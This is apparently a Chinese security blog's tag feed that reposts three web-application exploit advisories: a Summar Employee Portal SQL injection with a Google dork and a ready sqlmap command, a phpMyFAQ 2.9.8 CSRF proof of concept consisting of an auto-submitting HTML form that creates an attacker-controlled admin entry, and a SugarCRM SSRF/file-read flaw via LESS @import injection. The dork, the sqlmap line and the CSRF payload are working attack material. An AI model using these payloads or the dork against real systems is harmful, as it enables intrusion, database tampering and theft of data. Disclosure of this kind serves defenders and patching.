https://blog.qife122.com/tags/webapps/ Recent content in Webapps on 办公AI智能小助手 Hugo zh-cn qife Tue, 13 Jan 2026 12:02:14 +0800 https://blog.qife122.com/p/summar-employee-portal-3.98.0-%E8%AE%A4%E8%AF%81sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8/ Tue, 13 Jan 2026 12:02:14 +0800 https://blog.qife122.com/p/summar-employee-portal-3.98.0-%E8%AE%A4%E8%AF%81sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8/ <h1 id="漏洞标题-summar-employee-portal-3980---认证sql注入">漏洞标题: Summar Employee Portal 3.98.0 - 认证SQL注入</h1> <h1 id="google-dork-inurlmemberpagesquienesquienaspx">Google Dork: inurl:&quot;/MemberPages/quienesquien.aspx&quot;</h1> <h1 id="发布日期-2025-12-16">发布日期: 2025-12-16</h1> <h1 id="漏洞作者-peter-gabaldon--">漏洞作者: Peter Gabaldon - <a href="https://pgj11.com/">https://pgj11.com/</a></h1> <h1 id="厂商主页">厂商主页: <a href="https://www.summar.es/">https://www.summar.es/</a></h1> <h1 id="软件链接">软件链接: <a href="https://www.summar.es/software-recursos-humanos/">https://www.summar.es/software-recursos-humanos/</a></h1> <h1 id="受影响版本--3980">受影响版本: &lt; 3.98.0</h1> <h1 id="测试环境-kali-linux">测试环境: Kali Linux</h1> <h1 id="cve编号-cve-2025-40677">CVE编号: CVE-2025-40677</h1> <h1 id="漏洞描述-summar-software-的员工门户portal-del-empleado中存在sql注入漏洞该漏洞允许攻击者通过向-memberpagesquienesquienaspx-页面发送post请求并在参数-ctl00contentplaceholder1filtronombre-中注入恶意载荷从而对数据库进行检索创建更新和删除操作">漏洞描述: Summar Software 的“员工门户”（Portal del Empleado）中存在SQL注入漏洞。该漏洞允许攻击者通过向 <code>/MemberPages/quienesquien.aspx</code> 页面发送POST请求，并在参数 <code>ctl00$ContentPlaceHolder1$filtroNombre</code> 中注入恶意载荷，从而对数据库进行检索、创建、更新和删除操作。</h1> <p>$ sqlmap &ndash;random-agent -r req.sqli.xml -p &lsquo;ctl00%24ContentPlaceHolder1%24filtroNombre&rsquo; &ndash;dbms=&ldquo;MSSQL&rdquo;</p> https://blog.qife122.com/p/phpmyfaq-2.9.8%E4%B8%AD%E7%9A%84%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0csrf%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E8%AF%A6%E6%83%85/ Fri, 09 Jan 2026 20:33:42 +0800 https://blog.qife122.com/p/phpmyfaq-2.9.8%E4%B8%AD%E7%9A%84%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0csrf%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E8%AF%A6%E6%83%85/ <h1 id="漏洞标题phpmyfaq-298---跨站请求伪造csrf">漏洞标题：phpMyFaq 2.9.8 - 跨站请求伪造（CSRF）</h1> <h1 id="日期2025-11-25">日期：2025-11-25</h1> <h1 id="漏洞作者codeseclab">漏洞作者：CodeSecLab</h1> <h1 id="供应商主页httpsgithubcomthorstenphpmyfaq">供应商主页：https://github.com/thorsten/phpMyFAQ/</h1> <h1 id="软件链接httpsgithubcomthorstenphpmyfaq">软件链接：https://github.com/thorsten/phpMyFAQ/</h1> <h1 id="版本298">版本：2.9.8</h1> <h1 id="测试环境windows-10">测试环境：Windows 10</h1> <h1 id="cvecve-2017-15808">CVE：CVE-2017-15808</h1> <p><strong>PoC 代码：</strong></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p">&lt;</span><span class="nt">html</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">body</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">form</span> <span class="na">action</span><span class="o">=</span><span class="s">&#34;http://phpmyfaq/admin/index.php&#34;</span> <span class="na">method</span><span class="o">=</span><span class="s">&#34;GET&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;hidden&#34;</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;action&#34;</span> <span class="na">value</span><span class="o">=</span><span class="s">&#34;ajax&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;hidden&#34;</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;ajax&#34;</span> <span class="na">value</span><span class="o">=</span><span class="s">&#34;config&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;hidden&#34;</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;ajaxaction&#34;</span> <span class="na">value</span><span class="o">=</span><span class="s">&#34;add_instance&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;hidden&#34;</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;url&#34;</span> <span class="na">value</span><span class="o">=</span><span class="s">&#34;malicious&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;hidden&#34;</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;instance&#34;</span> <span class="na">value</span><span class="o">=</span><span class="s">&#34;malicious_instance&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;hidden&#34;</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;comment&#34;</span> <span class="na">value</span><span class="o">=</span><span class="s">&#34;CSRF Test&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;hidden&#34;</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;email&#34;</span> <span class="na">value</span><span class="o">=</span><span class="s">&#34;attacker@example.com&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;hidden&#34;</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;admin&#34;</span> <span class="na">value</span><span class="o">=</span><span class="s">&#34;attacker&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;hidden&#34;</span> <span class="na">name</span><span class="o">=</span><span class="s">&#34;password&#34;</span> <span class="na">value</span><span class="o">=</span><span class="s">&#34;password123&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">&#34;submit&#34;</span> <span class="na">value</span><span class="o">=</span><span class="s">&#34;Submit request&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">form</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nb">document</span><span class="p">.</span><span class="nx">forms</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">submit</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">script</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;/</span><span class="nt">body</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"><span class="p">&lt;/</span><span class="nt">html</span><span class="p">&gt;</span> </span></span></code></pre></td></tr></table> </div> </div><p><strong>复现步骤：</strong></p> https://blog.qife122.com/p/sugarcrm-14.0.0-ssrf%E4%B8%8E%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E8%AF%A6%E8%A7%A3/ Sat, 20 Sep 2025 15:43:25 +0800 https://blog.qife122.com/p/sugarcrm-14.0.0-ssrf%E4%B8%8E%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E8%AF%A6%E8%A7%A3/ <h1 id="漏洞标题sugarcrm-1400---ssrf代码注入">漏洞标题：SugarCRM 14.0.0 - SSRF/代码注入</h1> <h1 id="作者egidio-romano-aka-egix">作者：Egidio Romano aka EgiX</h1> <h1 id="邮箱n0b0d13sgmailcom">邮箱：n0b0d13s@gmail.com</h1> <h1 id="软件链接httpswwwsugarcrmcom">软件链接：https://www.sugarcrm.com</h1> <h1 id="受影响版本所有商业版本1304之前和1401之前">受影响版本：所有商业版本13.0.4之前和14.0.1之前。</h1> <h1 id="cve参考cve-2024-58258">CVE参考：CVE-2024-58258</h1> <h1 id="漏洞描述">漏洞描述：</h1> <p>通过GET参数传递给<code>/css/preview</code> REST API端点的用户输入在解析为LESS代码之前未经过适当清理。远程未经验证的攻击者可以利用此漏洞注入并执行任意LESS指令。通过滥用<code>@import</code> LESS语句，攻击者可以触发服务器端请求伪造（SSRF）或读取Web服务器上的任意本地文件，可能导致敏感信息泄露。</p>